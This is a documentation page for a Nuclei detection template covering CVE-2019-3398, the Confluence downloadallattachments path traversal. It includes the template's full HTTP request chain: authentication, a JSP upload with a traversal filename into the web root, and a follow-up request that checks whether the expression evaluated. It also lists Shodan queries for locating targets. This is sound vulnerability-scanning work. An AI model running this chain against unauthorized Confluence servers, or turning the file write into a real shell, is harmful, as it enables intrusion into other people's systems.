Atlassian Confluence Download Attachments - Remote Code Execution
ID: CVE-2019-3398
Severity: high
Author: rootxharsh,iamnoooob,pdresearch
Tags: cve,cve2019,packetstorm,atlassian,confluence,rce,authenticated,intrusive,kev
Description
Section titled “Description”Confluence Server and Data Center had a path traversal vulnerability in the downloadallattachments resource. A remote attacker who has permission to add attachments to pages and / or blogs or to create a new space or a personal space or who has ‘Admin’ permissions for a space can exploit this path traversal vulnerability to write files to arbitrary locations which can lead to remote code execution on systems that run a vulnerable version of Confluence Server or Data Center.
YAML Source
Section titled “YAML Source”id: CVE-2019-3398
info: name: Atlassian Confluence Download Attachments - Remote Code Execution author: rootxharsh,iamnoooob,pdresearch severity: high description: | Confluence Server and Data Center had a path traversal vulnerability in the downloadallattachments resource. A remote attacker who has permission to add attachments to pages and / or blogs or to create a new space or a personal space or who has 'Admin' permissions for a space can exploit this path traversal vulnerability to write files to arbitrary locations which can lead to remote code execution on systems that run a vulnerable version of Confluence Server or Data Center. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches provided by Atlassian to fix the vulnerability. reference: - https://blogs.juniper.net/en-us/threat-research/cve-2019-3398-atlassian-confluence-download-attachments-remote-code-execution - https://nvd.nist.gov/vuln/detail/CVE-2019-3398 - http://packetstormsecurity.com/files/152616/Confluence-Server-Data-Center-Path-Traversal.html - http://packetstormsecurity.com/files/155245/Atlassian-Confluence-6.15.1-Directory-Traversal.html - https://jira.atlassian.com/browse/CONFSERVER-58102 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2019-3398 cwe-id: CWE-22 epss-score: 0.97045 epss-percentile: 0.99757 cpe: cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:* metadata: max-request: 5 vendor: atlassian product: confluence shodan-query: - http.component:"atlassian confluence" - cpe:"cpe:2.3:a:atlassian:confluence" tags: cve,cve2019,packetstorm,atlassian,confluence,rce,authenticated,intrusive,kevvariables: num1: "{{rand_int(800000, 999999)}}" num2: "{{rand_int(800000, 999999)}}" result: "{{to_number(num1)*to_number(num2)}}"
http: - raw: - | POST /dologin.action HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
os_username={{username}}&os_password={{password}}&login=Log%2Bin&os_destination= - | GET /pages/createpage.action HTTP/1.1 Host: {{Hostname}} - | POST /plugins/drag-and-drop/upload.action?draftId={{draftID}}&filename=../../../../../../opt/atlassian/confluence/confluence/pages/{{randstr}}.jsp&size=8&mimeType=text%2Fplain&atl_token={{csrftoken}} HTTP/1.1 Host: {{Hostname}}
${{{num1}}*{{num2}}} - | GET /pages/downloadallattachments.action?pageId={{draftID}} HTTP/1.1 Host: {{Hostname}} - | GET /pages/{{randstr}}.jsp HTTP/1.1 Host: {{Hostname}}
host-redirects: true max-redirects: 2
matchers-condition: and matchers: - type: word part: body_5 words: - "{{result}}"
extractors: - type: regex name: csrftoken group: 1 regex: - 'name="atlassian\-token" content="([a-z0-9]+)"> ' internal: true part: body
- type: regex name: draftID group: 1 regex: - 'ta name="ajs\-draft\-id" content="([0-9]+)">' internal: true part: body# digest: 4a0a00473045022100cf68d5612476d4d387a8130741a04cac34138b708c32ed765eeead0672686c8a022015753134587a7b79707968cb76af91d6c3fb68edfaef26b1cfe5575698161f61:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-3398.yaml"